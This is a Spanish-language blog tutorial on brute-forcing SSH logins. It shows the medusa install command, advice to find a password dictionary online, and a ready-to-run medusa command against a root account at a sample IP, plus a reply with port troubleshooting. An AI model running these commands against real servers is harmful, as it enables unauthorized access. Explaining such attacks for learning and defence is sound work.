Como hacer ataque de fuerza bruta a servidor SSH

Este tipo de ataques es un clásico y por eso lo explico, no recomiendo su uso, ni me hago responsable de problemas que se puedan ocasionar.

En primer lugar, lo mejor que puedo hacer es explicar que es un servidor SSH. Se trata de un servicio que permite el acceso a la terminal (o shell) de un equipo de forma remota.

Para acceder a SSH debemos saber tres cosas:

  1. La dirección del equipo: Puede ser una IP o una dirección
  2. El nombre del usuario: también se admite el de administrador que en linux se llama root
  3. La contraseña de usuario.

Una conexión normal seria algo similar a esto:

usuario@MaquinaLocal:~$ ssh root@11.22.33.123
root@11.22.33.123's password: ******

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Sep 19 19:22:39 2017 from 79.109.145.37
root@MaquinaRemota:~#

Nos hemos conectado a la maquina remota 11.22.33.123 a través de ssh introduciendo la contraseña que conocemos de antemano.

En los ataques de fuerza bruta, conocemos dos factores, la dirección y el nombre de usuario, pero desconocemos la contraseña, por eso empleamos una contraseña tras otra de un listado hasta encontrar la correcta. Estos ataques son extremadamente lentos y que funcionan solo si la contraseña está en el listado.

Gandalf el gris extenuado tras un ataque infructuoso de fuerza bruta contra las puertas de Mória.

Ahora que sabemos que es SSH y que es un ataque de fuerza bruta vamos a ello:

  1. Abrimos nuestra consola e instalamos medusa si no lo tenemos
    sudo apt-get install medusa
  2. buscamos un diccionario en la web, existen muchos, no tendrás problemas en encontrar uno buscando ‘passwords.txt’ o ‘contraseñas.txt’
  3. ejecutamos medusa:
    medusa -h 11.22.33.123 -u root -P passwords.txt -M ssh
  4. Esperamos unas horas (o días) para ver si hay suerte

Espero que esta entrada haya resultado mas instructiva que útil, y espero tus comentarios mas abajo.

FUENTE:
SystemAdmin

2 comentarios

    • David Moreno

      En lo escueto de tu comentario entiendo que no te ha sido posible realizar el ataque.

      El ataque se debe lanzar contra un servidor ssh en el puerto 22, si no hay un servidor ssh no funciona, y si está en otro puerto, deberas indicarlo en el ataque.

Comments are closed.